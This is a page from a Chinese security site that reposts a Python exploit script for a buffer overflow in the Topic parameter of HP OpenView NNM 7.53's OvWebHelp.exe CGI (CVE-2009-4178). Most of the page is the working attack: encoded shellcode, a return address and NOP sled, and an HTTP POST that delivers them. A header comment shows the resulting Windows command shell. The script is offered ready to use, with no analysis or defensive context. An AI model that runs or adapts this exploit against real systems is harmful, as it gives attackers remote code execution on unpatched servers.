首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP OpenView NNM OvWebHelp.exe CGI Topic overflow
来源:vfocus.net 作者:S2 Crew 发布时间:2010-03-31  

#!/usr/bin/python

# Exploit title: HP OpenView NNM OvWebHelp.exe CGI Topic overflow
# Date: 2010.03.30
# Software link: hp.com<http://hp.com>
# Version: 7.53
# Tested on: Windows 2003 SP2
# CVE: 2009-4178
# Code:
############################################
# Trying 172.16.29.130...
# Connected to 172.16.29.130.
# Escape character is '^]'.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
############################################

import struct
import socket
import httplib
import urllib

#[*] x86/alpha_mixed succeeded with size 746 (iteration=1)
sc =(
"\x89\xe3\xd9\xc3\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x49\x78\x4e\x69\x45\x50\x45\x50\x43\x30\x45\x30\x4e"
"\x69\x48\x65\x44\x71\x4b\x62\x45\x34\x4e\x6b\x51\x42\x44\x70"
"\x4c\x4b\x43\x62\x44\x4c\x4e\x6b\x50\x52\x44\x54\x4e\x6b\x43"
"\x42\x45\x78\x44\x4f\x4e\x57\x50\x4a\x45\x76\x50\x31\x4b\x4f"
"\x46\x51\x49\x50\x4c\x6c\x45\x6c\x43\x51\x43\x4c\x45\x52\x46"
"\x4c\x47\x50\x4f\x31\x48\x4f\x44\x4d\x43\x31\x49\x57\x4b\x52"
"\x48\x70\x51\x42\x43\x67\x4c\x4b\x50\x52\x46\x70\x4e\x6b\x47"
"\x32\x45\x6c\x47\x71\x48\x50\x4c\x4b\x47\x30\x44\x38\x4f\x75"
"\x49\x50\x50\x74\x51\x5a\x43\x31\x4a\x70\x42\x70\x4c\x4b\x43"
"\x78\x46\x78\x4e\x6b\x43\x68\x45\x70\x47\x71\x48\x53\x4a\x43"
"\x45\x6c\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x47\x71\x4a\x76\x44"
"\x71\x4b\x4f\x45\x61\x49\x50\x4c\x6c\x4b\x71\x4a\x6f\x44\x4d"
"\x45\x51\x4a\x67\x47\x48\x4b\x50\x43\x45\x4b\x44\x46\x63\x51"
"\x6d\x49\x68\x45\x6b\x51\x6d\x46\x44\x43\x45\x4d\x32\x46\x38"
"\x4e\x6b\x42\x78\x44\x64\x45\x51\x49\x43\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4e\x6b\x50\x58\x47\x6c\x45\x51\x49\x43\x4e\x6b"
"\x46\x64\x4e\x6b\x47\x71\x4e\x30\x4f\x79\x50\x44\x46\x44\x51"
"\x34\x43\x6b\x43\x6b\x43\x51\x51\x49\x42\x7a\x46\x31\x49\x6f"
"\x4b\x50\x50\x58\x43\x6f\x50\x5a\x4c\x4b\x44\x52\x48\x6b\x4b"
"\x36\x51\x4d\x51\x78\x45\x63\x46\x52\x43\x30\x43\x30\x43\x58"
"\x42\x57\x42\x53\x46\x52\x51\x4f\x50\x54\x51\x78\x42\x6c\x50"
"\x77\x47\x56\x47\x77\x4b\x4f\x4b\x65\x4c\x78\x4a\x30\x47\x71"
"\x47\x70\x43\x30\x51\x39\x49\x54\x51\x44\x50\x50\x45\x38\x46"
"\x49\x4d\x50\x50\x6b\x43\x30\x49\x6f\x49\x45\x50\x50\x42\x70"
"\x50\x50\x42\x70\x43\x70\x50\x50\x47\x30\x50\x50\x51\x78\x49"
"\x7a\x44\x4f\x49\x4f\x4b\x50\x4b\x4f\x4b\x65\x4e\x69\x4f\x37"
"\x50\x31\x49\x4b\x51\x43\x45\x38\x44\x42\x47\x70\x47\x61\x51"
"\x4c\x4e\x69\x4b\x56\x43\x5a\x46\x70\x42\x76\x51\x47\x50\x68"
"\x4b\x72\x49\x4b\x44\x77\x43\x57\x4b\x4f\x49\x45\x50\x53\x43"
"\x67\x45\x38\x48\x37\x49\x79\x44\x78\x49\x6f\x4b\x4f\x4e\x35"
"\x51\x43\x51\x43\x51\x47\x45\x38\x50\x74\x48\x6c\x47\x4b\x49"
"\x71\x49\x6f\x4a\x75\x42\x77\x4d\x59\x48\x47\x51\x78\x44\x35"
"\x42\x4e\x42\x6d\x50\x61\x49\x6f\x49\x45\x50\x68\x42\x43\x42"
"\x4d\x51\x74\x43\x30\x4d\x59\x49\x73\x50\x57\x46\x37\x43\x67"
"\x50\x31\x48\x76\x42\x4a\x45\x42\x46\x39\x46\x36\x4d\x32\x49"
"\x6d\x42\x46\x48\x47\x43\x74\x46\x44\x47\x4c\x47\x71\x43\x31"
"\x4e\x6d\x43\x74\x51\x34\x46\x70\x4f\x36\x43\x30\x42\x64\x46"
"\x34\x42\x70\x50\x56\x50\x56\x43\x66\x42\x66\x51\x46\x50\x4e"
"\x46\x36\x43\x66\x46\x33\x43\x66\x51\x78\x44\x39\x48\x4c\x47"
"\x4f\x4c\x46\x4b\x4f\x4b\x65\x4e\x69\x4d\x30\x42\x6e\x50\x56"
"\x43\x76\x49\x6f\x46\x50\x43\x58\x44\x48\x4d\x57\x47\x6d\x51"
"\x70\x49\x6f\x4a\x75\x4d\x6b\x4c\x30\x4c\x75\x4f\x52\x43\x66"
"\x42\x48\x4d\x76\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x48\x55\x47"
"\x4c\x47\x76\x43\x4c\x45\x5a\x4b\x30\x4b\x4b\x4d\x30\x44\x35"
"\x43\x35\x4f\x4b\x51\x57\x42\x33\x51\x62\x50\x6f\x43\x5a\x45"
"\x50\x42\x73\x49\x6f\x4a\x75\x46\x6a\x41\x41")

data="A"*57
data2 = "B"*5000
ret = "\xDF\xf2\xe5\x77" + "\x90" * 254 + sc # call esp kernel32.dll
payload = data + ret

p = urllib.urlencode({'Topic':payload,'Target':data2})
h = {"Content-Type": "application/x-www-form-urlencoded","Accept": "text/html","User-Agent": "BackTrack", "Accept-Language": "en"}

c = httplib.HTTPConnection('172.16.29.130')
c.request("POST","/OvCgi/OvWebHelp.exe",p,h)
r = c.getresponse()

print r.status, r.reason
c.close()

print "\nDone\n"



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CompleteFTP Server Directory T
·Free MP3 CD Ripper 2.6 0-day
·Easy Icon Maker .ico File Read
·Xilisoft Blackberry Ring Tone
·Xilisoft Blackberry Ring Tone
·ASX to MP3 Converter Version 3
·MyBB 2002-2010 exploit
·Shadow Stream Recorder 3.0.1.7
·Easy-Clanpage <= v2.2 multiple
·All to All Audio Convertor v2.
·Centreon IT & Network Monitori
·RM Downloader 3.0.2.1 (.asx) L
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved